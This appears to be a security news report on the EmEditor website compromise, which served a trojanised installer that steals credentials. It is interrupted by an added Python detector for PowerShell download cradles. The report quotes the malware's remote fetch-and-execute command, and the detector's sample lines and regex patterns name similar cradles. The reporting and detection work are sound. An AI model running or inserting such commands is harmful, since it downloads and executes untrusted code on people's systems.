EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack

A major supply chain attack targeting EmEditor, a widely used text editor software, has exposed millions of users to sophisticated infostealer malware.

Between December 19 and December 22, 2025, the official EmEditor website fell victim to unauthorized modification, serving compromised installer files to unsuspecting users during a critical four-day window.

The company confirmed that users who downloaded version 25.4.3 through the Download Now button received malicious files instead of legitimate software, creating a significant security breach affecting developers, system administrators, and technical professionals worldwide.

The attack exploited the redirect mechanism controlling EmEditor’s download pathway. Attackers altered the URL settings that normally directed users to legitimate installation files, instead pointing them to a malicious version hosted on EmEditor’s WordPress content directory.

EmEditor Editor (Source - Qianxin)

The compromised installer was digitally signed by “WALSHAM INVESTMENTS LIMITED,” an organization with no connection to Emurasoft Inc., the software’s legitimate publisher.

PowerShell (Source - Qianxin)

This spoofed signature added a deceptive layer of authenticity that many users might not have questioned.

Qianxin analysts identified the malware after careful forensic examination, revealing a comprehensive information-stealing payload embedded within the installation package.

The malicious code demonstrated a sophisticated design that mirrors legitimate EmEditor functionality, allowing it to operate silently during and after installation while collecting sensitive user data.

Infection mechanism

The malware’s infection mechanism operates through an embedded VBScript that executes a PowerShell command: powershell.exe “irm emeditorjp.com | iex”. Here irm is the alias of Invoke-RestMethod and iex the alias of Invoke-Expression, so the one-liner fetches a script from emeditorjp.com and evaluates it.

Because the downloaded code is executed directly in memory and never written to disk as a file, this stage evades traditional file-based detection methods.
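As an added defender-side example (not code from the article or from the Qianxin report), the following Python script flags PowerShell download cradles of the shape described above, a download cmdlet such as irm/Invoke-RestMethod piped into iex/Invoke-Expression, in script block log entries of the kind Windows records under Event ID 4104. The sample entries are constructed for this example; apart from the emeditorjp.com command quoted in the article, they use example.invalid hosts.

```python
import re

# Constructed sample script block log entries (Event ID 4104 style).
# Only the first line is the command quoted in the article; the rest
# use reserved example.invalid hosts and are not real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    'powershell.exe "irm emeditorjp.com | iex"',
    "Get-ChildItem C:\\Users | Select-Object Name",
    "Invoke-RestMethod -Uri https://example.invalid/payload | Invoke-Expression",
    "iwr 'http://example.invalid/a.ps1' -UseBasicParsing | iex",
    "$p = irm example.invalid; Invoke-Expression $p",
    "Invoke-RestMethod https://api.github.com/repos | ConvertFrom-Json",
]

# Cmdlets (and their built-in aliases) that pull content from the network.
DOWNLOAD_CMDLETS = r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget)\b"
# Cmdlets that evaluate a string as PowerShell code.
EXEC_CMDLETS = r"\b(?:iex|invoke-expression)\b"

CRADLE_PATTERNS = [
    # Download output piped straight into execution: irm host | iex
    re.compile(DOWNLOAD_CMDLETS + r"[^|;\n]*\|\s*" + EXEC_CMDLETS, re.IGNORECASE),
    # Download stored in a variable, then that variable passed to iex:
    # $x = irm host; iex $x
    re.compile(r"(\$\w+)\s*=\s*" + DOWNLOAD_CMDLETS + r".*?" + EXEC_CMDLETS + r"\s+\1\b",
               re.IGNORECASE | re.DOTALL),
]

# First URL or host-like token after the download cmdlet, for triage output.
TARGET_RE = re.compile(DOWNLOAD_CMDLETS + r"\s+(?:-uri\s+)?['\"]?([\w.\-:/]+)", re.IGNORECASE)


def is_download_cradle(script_block: str) -> bool:
    """Return True if the script block downloads code and executes it in memory."""
    return any(p.search(script_block) for p in CRADLE_PATTERNS)


def extract_target(script_block: str) -> str:
    """Return the host or URL the cradle fetches from, or '' if none is found."""
    m = TARGET_RE.search(script_block)
    return m.group(1) if m else ""


def detect_download_cradles(script_blocks):
    """Return (script_block, target) pairs for every entry that matches a cradle pattern."""
    hits = []
    for block in script_blocks:
        if is_download_cradle(block):
            hits.append((block, extract_target(block)))
    return hits


if __name__ == "__main__":
    for block, target in detect_download_cradles(SAMPLE_SCRIPT_BLOCKS):
        print(f"download cradle -> {target!r}: {block}")
```

The patterns deliberately match on aliases as well as full cmdlet names, since short forms like irm and iex are what appear in the command quoted above; a rule that only looked for Invoke-Expression would miss it. Case-insensitive matching matters too, because PowerShell itself is case-insensitive and attackers mix case freely.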

The payload steals credentials from web browsers, including Chrome, Edge, Brave, and Opera, capturing cookies, login data, and browsing history.

It also targets credentials from productivity applications such as Discord, Slack, Zoom, Microsoft Teams, WinSCP, and PuTTY, creating a severe risk for enterprise users managing sensitive communications and infrastructure access.

The malware employs persistence tactics through a malicious browser extension named “Google Drive Caching,” which maintains unauthorized access even after the initial infection.

Google Drive Caching (Source - Qianxin)

This extension contains Domain Generation Algorithm (DGA) capabilities, allowing the attackers to maintain resilient command-and-control communications across multiple dynamically generated domains rather than depending on a single fixed domain that could be blocked.

The extension can steal Facebook advertising account credentials, monitor clipboard activities for cryptocurrency address replacement attacks, and execute remote commands to extract additional data or manipulate browser behavior.

Victims are advised to disconnect affected systems immediately, perform comprehensive malware scans, and reset all credentials used on compromised devices.
